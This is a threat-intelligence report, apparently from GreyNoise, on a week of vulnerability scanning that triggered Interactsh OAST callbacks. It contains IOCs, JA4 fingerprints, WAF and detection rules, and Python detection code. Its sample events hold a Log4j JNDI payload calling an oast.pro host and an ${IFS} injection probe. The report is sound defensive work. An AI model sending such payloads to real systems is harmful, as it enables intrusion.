GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-02-06

GreyNoise has identified sustained vulnerability reconnaissance activity from 245 unique IP addresses generating 3,979 sensor sessions containing OAST callbacks across 82 distinct scanning campaigns. Analysis reveals a heterogeneous scanning landscape dominated by hosting provider infrastructure conducting broad-spectrum vulnerability detection, with anomalous TCP fingerprints indicating Nuclei scanner deployment across 20 distinct hosts.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author

🔮Orbie✨

Published

February 7, 2026

Overview

During the week of January 31 - February 7, 2026, GreyNoise sensors observed 3,979 HTTP sessions from 245 unique IP addresses containing callbacks to Interactsh OAST (Out-of-band Application Security Testing) domains. The activity generated 3,707 unique OAST domains spanning 82 distinct campaign identifiers, indicating numerous independent scanning operations rather than coordinated infrastructure.

Analysis employed JA4T+JA4H fingerprint clustering, OAST domain decoding, and GreyNoise IP enrichment to characterize the scanning landscape. Key findings include:

  • Hosting Infrastructure Dominance: Top ASNs include RouterHosting LLC (AS14956, 1,084 sessions), Cloudflare (AS13335, 651 sessions), and netcup GmbH (AS214996, 545 sessions)
  • Scanner Identification: MSS value analysis reveals 1,341 sessions (33.7%) exhibit the anomalous MSS 65495 fingerprint characteristic of Nuclei scanner deployment
  • CVE Targeting: 196 distinct vulnerability tags observed, with Apache Log4j RCE (CVE-2021-44228) accounting for 1,090 attempts (27.4% of total activity)
  • Malicious Classification: GreyNoise classifies 19 of 20 top source IPs as “noise,” with established reconnaissance infrastructure dating back to November 2025

The distributed nature of campaigns, absence of IP overlap between major campaigns, and heterogeneous fingerprint patterns indicate independent security testing operations rather than coordinated threat actor infrastructure.

Temporal Analysis

Activity exhibited consistent volume across the analysis period with notable variations:

| Date   | Sessions | Unique IPs | Unique Campaigns | Pattern                  |
|--------|----------|------------|------------------|--------------------------|
| Jan 31 | 699      | 6          | 11               | Initial baseline         |
| Feb 1  | 642      | 10         | 18               | Sustained activity       |
| Feb 2  | 236      | 7          | 13               | Weekend reduction        |
| Feb 3  | 149      | 11         | 15               | Low point                |
| Feb 4  | 631      | 12         | 20               | Mid-week surge           |
| Feb 5  | 386      | 12         | 17               | Sustained                |
| Feb 6  | 573      | 214        | 20               | Anomalous multi-IP event |
| Feb 7  | 663      | 12         | 6                | Return to baseline       |

Temporal Anomaly - February 6: A single-day spike to 214 unique IPs (vs. baseline 6-12) occurred on February 6, driven by campaign 01p6c, which recorded 204 unique IPs targeting a single OAST domain. This pattern suggests either:

  1. A shared/reused OAST domain from prior scanning that triggered callbacks from cached payloads
  2. A mass exploitation attempt using a common callback infrastructure

Hourly analysis reveals burst patterns concentrated in specific time windows:

  • Jan 31, 15:00 UTC: 273 sessions (single campaign burst)
  • Jan 31, 22:00 UTC: 135 sessions (campaign concentration)
  • Feb 1, 15:00 UTC: 112 sessions (sustained scanning window)

No consistent diurnal pattern emerged, suggesting globally distributed scanning infrastructure operating across multiple timezones.

Campaign Analysis

The 82 identified campaigns exhibit high heterogeneity, with most representing single-IP operations. Top campaigns by volume:

Campaign: lftn9 (ksort: d5v0a0)

  • Sessions: 652
  • Source IPs: 1 (172.86.66.237)
  • ASN: AS14956 (RouterHosting LLC)
  • Active Period: Jan 31 - Feb 1
  • Machine ID: af:ed:d2
  • PID: 43608
  • Fingerprint: JA4T 64240_2-4-8-1-3_1460_7 (standard MSS)
  • GreyNoise Profile: Malicious classification, 7.4M sensor hits across 4 sensors, first seen Jan 19, 2026. Full-spectrum scanner with 300+ tags including Log4j, Confluence, pfSense, and numerous CVE-specific tags. Targets 169 ports.

Campaign: ibe4q (ksort: d638bj)

  • Sessions: 603
  • Source IPs: 9 (Cloudflare-hosted)
  • ASN: AS13335 (Cloudflare, Inc.)
  • Active Period: Feb 7 (single day burst)
  • Machine ID: 4b:71:35
  • PID: 50516
  • Fingerprint: JA4T 65535_2-4-8-1-3_1380_13 (MSS 1380 - Cloudflare characteristic)
  • Pattern: Multiple IPs from same ASN suggest Cloudflare-hosted scanning infrastructure

Campaign: 7bm4o (ksort: d627ng, d61gfu, d62tr4)

  • Sessions: 545 total (245 + 210 + 90 across three runs)
  • Source IPs: 1 (152.53.55.52)
  • ASN: AS214996 (netcup GmbH)
  • Active Period: Feb 4-6 (repeated execution)
  • Machine ID: eb:b1:31
  • PIDs: 13592, 19613, 56288 (different process per run)
  • Fingerprint: JA4T 65495_2-4-8-1-3_65495_7 (Nuclei scanner MSS signature)
  • GreyNoise Profile: Malicious classification, 16.8K sensor hits across 194 sensors, first seen Feb 3, 2026. Focused targeting: Log4j, React Server Components deserialization (CVE-2025-55182).

Campaign: j6o66 (ksort: d61fft)

  • Sessions: 231
  • Source IPs: 1 (38.55.192.204)
  • ASN: AS139659 (LUCIDACLOUD LIMITED)
  • Active Period: Feb 4-5
  • Fingerprint: JA4T 64240_2-4-8-1-3_1460_7 (standard MSS)
  • GreyNoise Profile: NOT classified (no GreyNoise intelligence available)

Campaign: 01p6c (ksort: cspn4b) - Anomaly

  • Sessions: 204
  • Source IPs: 204 (one-to-one mapping)
  • ASNs: 5 distinct (AS20473, AS207990, AS202412, AS215439, AS8075)
  • Active Period: Feb 6 (single day)
  • Machine ID: 01:c9:98
  • PID: 50061
  • Pattern: Single OAST domain triggered callbacks from 204 distinct IPs. Likely represents cached payloads from earlier scanning activity or mass exploitation with shared callback infrastructure.

Infrastructure Fingerprinting

JA4 Fingerprint Analysis

Three dominant MSS patterns emerged, revealing scanner tooling:

| MSS Category | Sessions      | IPs | Interpretation                    |
|--------------|---------------|-----|-----------------------------------|
| MSS 1460     | 1,527 (38.4%) | 18  | Standard TCP MSS (Linux default)  |
| MSS 65495    | 1,341 (33.7%) | 20  | Nuclei scanner signature          |
| MSS 1380     | 651 (16.4%)   | 9   | Cloudflare WARP VPN characteristic |
| Other        | 460 (11.6%)   | 209 | Heterogeneous/unclassified        |

MSS 65495 Anomaly: The use of MSS 65495 is a well-documented fingerprint of the Nuclei vulnerability scanner. This non-standard value appears in JA4T fingerprints as 65495_2-4-8-1-3_65495_7, indicating explicit configuration of TCP Maximum Segment Size to this unusual value. 20 distinct IPs exhibited this fingerprint, spanning ASNs including AS214996 (netcup), AS14956 (RouterHosting), AS210083 (Privex), and AS14061 (DigitalOcean).

Cloudflare MSS 1380: All 651 sessions with MSS 1380 originated from AS13335 (Cloudflare), consistent with Cloudflare’s WARP VPN service TCP characteristics. GreyNoise confirms VPN classification for 104.28.193.87 (WARP_VPN service).

ASN Distribution

Top autonomous systems by session volume:

| ASN      | Organization         | Sessions | IPs | Campaigns | Category        |
|----------|----------------------|----------|-----|-----------|-----------------|
| AS14956  | RouterHosting LLC    | 1,084    | 2   | 6         | Hosting         |
| AS13335  | Cloudflare, Inc.     | 651      | 9   | 2         | CDN/Hosting     |
| AS214996 | netcup GmbH          | 545      | 1   | 2         | Hosting         |
| AS14061  | DigitalOcean, LLC    | 269      | 4   | 7         | Cloud hosting   |
| AS139659 | LUCIDACLOUD LIMITED  | 256      | 1   | 2         | Hosting         |
| AS51852  | Private Layer INC    | 210      | 1   | 3         | Privacy hosting |
| AS20473  | The Constant Company | 185      | 178 | 3         | Hosting (Vultr) |
| AS210083 | Privex Inc.          | 158      | 1   | 9         | Privacy hosting |

The dominance of hosting providers and cloud infrastructure reflects the typical scanning landscape with actors operating from rented VPS infrastructure.

Payload Analysis

GreyNoise tag analysis reveals broad-spectrum vulnerability reconnaissance targeting 196 distinct vulnerability classes:

Top CVE Targets

| CVE / Payload Type                   | Sessions | Unique IPs | Description                |
|--------------------------------------|----------|------------|----------------------------|
| Apache Log4j RCE (CVE-2021-44228)    | 1,090    | 94         | Log4Shell JNDI injection   |
| Fastjson RCE                         | 319      | 12         | Java deserialization       |
| Generic XSS                          | 186      | 19         | Cross-site scripting probes |
| CGI Script Scanner                   | 184      | 16         | Legacy CGI vulnerabilities |
| Generic ${IFS} RCE                   | 142      | 9          | Bash command injection     |
| pfSense pfBlockerNG (CVE-2023-47246) | 136      | 7          | Command injection          |
| Draytek Vigor (CVE-2024-12987)       | 126      | 4          | Router command injection   |
| GPON Router (CVE-2018-10561)         | 112      | 15         | Router worm attempts       |
| Path Traversal                       | 92       | 15         | Directory traversal        |
| Seagate BlackArmor                   | 62       | 14         | NAS RCE attempts           |

Payload Characteristics

  • Deserialization Targets: Fastjson, XStream, Apache OFBiz, Oracle WebLogic - focus on Java deserialization chains
  • IoT/Edge Devices: GPON routers, Draytek, pfSense, Zyxel, Totolink - embedded device targeting
  • Enterprise Software: Atlassian Confluence (CVE-2022-26134), VMware vCenter, FortiOS, Citrix
  • CMS/Web Apps: WordPress plugins (multiple SQLi/RCE vulnerabilities), Joomla, Drupal

No evidence of active exploitation or malware delivery infrastructure. Activity patterns consistent with vulnerability research, CVE validation, and attack surface mapping.

GreyNoise Enrichment Analysis

GreyNoise multi-IP check on the top 20 source IPs revealed:

  • 19/20 classified as “noise” (active Internet scanners)
  • 0/20 identified as common business services (not CDN/legitimate traffic)
  • 1/20 with no classification (38.55.192.204 - potentially new infrastructure)

Notable GreyNoise Profiles

172.86.66.237 (RouterHosting LLC)

  • Classification: MALICIOUS
  • First Seen: Jan 19, 2026 (pre-dates analysis window)
  • Sensor Hits: 7,418,938 across 4 sensors
  • Tags: 300+ vulnerability-specific tags (full-spectrum scanner)
  • Scanned Ports: 169 ports (comprehensive port scanning)
  • Bot: No | Tor: No | VPN: No
  • Assessment: Established reconnaissance infrastructure, long-term persistent scanning

152.53.55.52 (netcup GmbH)

  • Classification: MALICIOUS
  • First Seen: Feb 3, 2026 (recent activation)
  • Sensor Hits: 16,848 across 194 sensors (broad targeting)
  • Tags: Log4j, React Server Components CVE-2025-55182, OAST domains
  • Scanned Ports: 10 (web-focused: 80, 443, 3000, 8080, 9000, etc.)
  • Bot: No | Tor: No | VPN: No
  • Assessment: Focused web vulnerability scanner, recent deployment

104.28.193.87 (Cloudflare)

  • Classification: MALICIOUS
  • First Seen: Nov 9, 2025 (long-term infrastructure)
  • Sensor Hits: 81,099 across 17 sensors
  • Tags: 400+ tags (full-spectrum scanner)
  • Scanned Ports: 5 (web-only: 80, 443, 7001, 8080, 8443)
  • Bot: No | Tor: No | VPN: Yes (WARP_VPN)
  • Assessment: Cloudflare-hosted scanning via WARP VPN, established infrastructure

Attribution Assessment

Confidence: Low

The distributed, heterogeneous nature of observed activity precludes meaningful threat actor attribution. Evidence suggests:

Evidence Supporting Independent Operations:

  1. Campaign Isolation: 82 distinct campaigns with minimal IP overlap (exception: Feb 6 anomaly)
  2. Diverse Infrastructure: 245 IPs across 45+ ASNs spanning 30+ countries
  3. Heterogeneous Tooling: Mix of Nuclei (MSS 65495), custom tooling (standard MSS), Cloudflare-hosted infrastructure
  4. Varied Targeting: While Log4j dominates, 196 distinct vulnerability classes indicate non-coordinated reconnaissance priorities
  5. Temporal Distribution: No coordinated timing patterns; activity distributed across timezones

Infrastructure Categories:

  • Bug Bounty Hunters: Single-IP campaigns with focused targeting patterns
  • Penetration Testing Tools: Nuclei scanner deployment (20 IPs)

No indicators of coordinated threat actor activity, nation-state operations, or organized criminal infrastructure.

Network IOCs

Primary Source IPs

| IP Address     | ASN      | Organization      | Sessions | Campaigns | GreyNoise       |
|----------------|----------|-------------------|----------|-----------|-----------------|
| 172.86.66.237  | AS14956  | RouterHosting LLC | 867      | 4         | MALICIOUS       |
| 152.53.55.52   | AS214996 | netcup GmbH       | 545      | 2         | MALICIOUS       |
| 104.28.193.87  | AS13335  | Cloudflare        | 389      | 2         | MALICIOUS (VPN) |
| 38.55.192.204  | AS139659 | LUCIDACLOUD       | 256      | 2         | None            |
| 107.189.16.186 | AS14956  | RouterHosting LLC | 217      | 2         | MALICIOUS       |
| 179.43.146.42  | AS51852  | Private Layer INC | 210      | 3         | MALICIOUS       |
| 185.130.47.197 | AS210083 | Privex Inc.       | 158      | 9         | MALICIOUS       |
| 209.38.59.247  | AS14061  | DigitalOcean      | 126      | 2         | MALICIOUS       |
| 94.156.102.143 | AS215439 | PLAY2GO INTL      | 104      | 2         | MALICIOUS       |
| 20.64.169.232  | AS8075   | Microsoft Corp    | 94       | 5         | MALICIOUS       |

OAST Domain Pattern

All observed domains follow Interactsh format:

[subdomain].oast.pro

Example campaign domains:

  • Campaign lftn9: d5v0a0lftn9*.oast.pro (652 unique domains)
  • Campaign ibe4q: d638bjibe4q*.oast.pro (603 unique domains)
  • Campaign 7bm4o: d627ng7bm4o*.oast.pro, d61gfu7bm4o*.oast.pro, d62tr47bm4o*.oast.pro (545 total)

Decoding Pattern:

  • ksort value (e.g., d5v0a0) represents timestamp + sequential identifier
  • campaign value (e.g., lftn9) derived from machine ID, PID, and counter
  • Each session generates a unique subdomain for callback correlation
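The decoding described above, carried out in code as an added example (not GreyNoise's own tooling). It assumes that the first 20 characters of an Interactsh label are a base32hex-encoded xid (4-byte timestamp, 3-byte machine ID, 2-byte PID, 3-byte counter), which is the layout under which the report's ksort, campaign, machine ID and PID fields line up; the sample hostnames are constructed, with only their first 11 characters taken from the report's lftn9 campaign.

```python
from dataclasses import dataclass
from datetime import datetime, timezone

# base32hex alphabet used by xid-style identifiers (assumption: Interactsh correlation IDs are xids)
B32HEX = "0123456789abcdefghijklmnopqrstuv"
CORRELATION_LEN = 20  # leading label chars carrying the ID; the remainder is per-session randomness

@dataclass
class Callback:
    ksort: str          # label[0:6], the report's timestamp-derived ksort
    campaign: str       # label[6:11], the report's campaign identifier
    timestamp: datetime
    machine_id: str     # e.g. "af:ed:d2"
    pid: int
    counter: int

def decode_correlation_id(cid: str) -> bytes:
    """20 base32hex chars -> 12 bytes laid out as ts(4) | machine(3) | pid(2) | counter(3)."""
    if len(cid) != CORRELATION_LEN or any(c not in B32HEX for c in cid):
        raise ValueError(f"not a {CORRELATION_LEN}-char base32hex id: {cid!r}")
    n = 0
    for c in cid:
        n = (n << 5) | B32HEX.index(c)
    return (n >> 4).to_bytes(12, "big")  # 100 bits decoded; the low 4 are padding

def parse_oast_host(host: str) -> Callback:
    """Split an Interactsh hostname into the fields the report tabulates per campaign."""
    label = host.lower().rstrip(".").split(".")[0]
    raw = decode_correlation_id(label[:CORRELATION_LEN])
    return Callback(
        ksort=label[:6],
        campaign=label[6:11],
        timestamp=datetime.fromtimestamp(int.from_bytes(raw[0:4], "big"), tz=timezone.utc),
        machine_id=":".join(f"{b:02x}" for b in raw[4:7]),
        pid=int.from_bytes(raw[7:9], "big"),
        counter=int.from_bytes(raw[9:12], "big"),
    )

def group_by_campaign(hosts) -> dict:
    """Tally sessions per campaign and collect its ksort runs, as the report's campaign tables do."""
    groups = {}
    for cb in map(parse_oast_host, hosts):
        g = groups.setdefault(cb.campaign, {"sessions": 0, "ksorts": set(), "machine_id": cb.machine_id})
        g["sessions"] += 1
        g["ksorts"].add(cb.ksort)
    return groups

# Constructed sample hostnames: the first 11 chars are the report's lftn9 campaign, the rest is made up.
SAMPLE_HOSTS = [
    "d5v0a0lftn9akm00000gabcdefghijklm.oast.pro",
    "d5v0a0lftn9akm00001gabcdefghijklm.oast.pro",
]
```

Decoding the constructed labels yields a 2026-01-31 timestamp and machine ID af:ed:d2, which is how the report's "Active Period" and "Machine ID" lines for lftn9 are derived.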

JA4 Fingerprints for Detection

Nuclei Scanner (MSS 65495):

JA4T: 65495_2-4-8-1-3_65495_7
JA4H: ge11nr17${jn_8062e975b6e7_*

Standard MSS (RouterHosting infrastructure):

JA4T: 64240_2-4-8-1-3_1460_7
JA4H: ge11nn020000_1af9d02f0bf7_*
JA4H: po11nn060000_4ea4093e6290_*
JA4H: ge10nn010000_4a823118b9ba_*

Cloudflare WARP VPN:

JA4T: 65535_2-4-8-1-3_1380_13
JA4H: po11nn08en00_9cf61e78b7a7_*

Detection Recommendations

  1. Monitor for Interactsh OAST callbacks in outbound DNS and HTTP traffic. Alert on requests to *.oast.pro, *.interact.sh, and *.burpcollaborator.net domains originating from internal production systems (exception: authorized security testing).

  2. JA4 fingerprint detection for Nuclei scanner identification:

    • Alert on JA4T fingerprint 65495_2-4-8-1-3_65495_7
    • Correlate with OAST callbacks for high-confidence reconnaissance detection
  3. Prioritize patching for top targeted CVEs:

    • CVE-2021-44228 (Log4Shell) - 1,090 attempts observed
    • CVE-2023-47246 (pfSense pfBlockerNG) - 136 attempts
    • CVE-2024-12987 (Draytek Vigor) - 126 attempts
    • CVE-2022-26134 (Atlassian Confluence) - 57 attempts
  4. ASN-based rate limiting for hosting providers exhibiting malicious classification:

    • AS14956 (RouterHosting LLC)
    • AS214996 (netcup GmbH)
    • AS210083 (Privex Inc.)
    • Consider geo-blocking or aggressive rate limiting for non-business-critical origins
  5. WAF rules for OAST injection patterns:

    • Block requests containing ${jndi:ldap:// (Log4j)
    • Block requests with .oast.pro, .interact.sh in headers, body, or query parameters
    • Alert on ${IFS} command injection attempts
  6. February 6 anomaly investigation: Organizations with traffic to/from the 204 IPs in campaign 01p6c should investigate for cached exploitation attempts. The spike suggests payloads planted by earlier scanning whose OAST callbacks were delayed.
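Recommendations 1, 2 and 5 above, expressed as detection logic over sample HTTP events, as an added example that is not part of the report: the event schema (src, ja4t, uri, headers), the severity scheme and the sample events are constructed; the OAST suffixes, the MSS 65495 JA4T field and the request markers come from the report.

```python
import re
from typing import Optional

# Out-of-band interaction domains named in the report's first recommendation.
OAST_SUFFIXES = (".oast.pro", ".interact.sh", ".burpcollaborator.net")
NUCLEI_MSS = 65495  # anomalous TCP MSS the report associates with Nuclei
# Request substrings from the report's WAF recommendation, lower-cased for matching.
INJECTION_MARKERS = {"${jndi:": "log4j-jndi", "${ifs}": "ifs-command-injection"}
HOST_RE = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+")

def ja4t_mss(ja4t: str) -> Optional[int]:
    """JA4T is window_options_mss_scale; return the MSS field, or None if malformed."""
    parts = ja4t.split("_")
    return int(parts[2]) if len(parts) == 4 and parts[2].isdigit() else None

def is_oast_host(host: str) -> bool:
    h = host.lower().rstrip(".")
    return any(h.endswith(s) or h == s[1:] for s in OAST_SUFFIXES)

def evaluate(event: dict) -> Optional[dict]:
    """Score one HTTP event (constructed schema: src, ja4t, uri, headers) against the report's rules."""
    reasons = []
    if ja4t_mss(event.get("ja4t", "")) == NUCLEI_MSS:
        reasons.append("ja4t-nuclei-mss")
    text = (event.get("uri", "") + " " + " ".join(event.get("headers", []))).lower()
    if any(is_oast_host(h) for h in HOST_RE.findall(text)):
        reasons.append("oast-callback-domain")
    reasons += [tag for marker, tag in INJECTION_MARKERS.items() if marker in text]
    if not reasons:
        return None
    # Recommendation 2: Nuclei fingerprint plus an OAST callback is the high-confidence case.
    high = {"ja4t-nuclei-mss", "oast-callback-domain"} <= set(reasons)
    return {"src": event["src"], "reasons": reasons, "severity": "high" if high else "medium"}

def scan(events) -> list:
    """Return alerts for every event that matched at least one rule."""
    return [a for a in map(evaluate, events) if a is not None]

# Constructed sample events (RFC 5737 documentation addresses; the OAST label is made up).
SAMPLE_EVENTS = [
    {"src": "198.51.100.7", "ja4t": "65495_2-4-8-1-3_65495_7",
     "uri": "/?x=${jndi:ldap://d5v0a0lftn9akm00000gabcdefghijklm.oast.pro/a}", "headers": []},
    {"src": "203.0.113.9", "ja4t": "64240_2-4-8-1-3_1460_7",
     "uri": "/cgi-bin/status?cmd=${IFS}", "headers": ["User-Agent: Mozilla/5.0"]},
    {"src": "192.0.2.44", "ja4t": "64240_2-4-8-1-3_1460_7",
     "uri": "/index.html", "headers": ["Host: www.example.com"]},
]
```

Only the first sample event combines the Nuclei MSS with an OAST callback and is rated high; the ${IFS} probe alone is medium, and ordinary traffic produces no alert.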

GNQL Queries

Monitor recent OAST callback activity:

tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d

Track Nuclei scanner deployment (MSS 65495):

metadata.ja4.tcp:"65495_2-4-8-1-3_65495_7" last_seen:7d

Investigate top malicious ASNs:

metadata.asn:AS14956 last_seen:7d
metadata.asn:AS214996 last_seen:7d
metadata.asn:AS13335 tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d

Log4j targeting IPs:

tags:"Apache Log4j RCE Attempt" tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d

Cloudflare-hosted scanners:

metadata.asn:AS13335 classification:malicious last_seen:7d

New/emerging scanning infrastructure (Feb 3+ first seen):

tags:"Generic Contains Well-known Out-of-band Interaction Domain" first_seen:>2026-02-03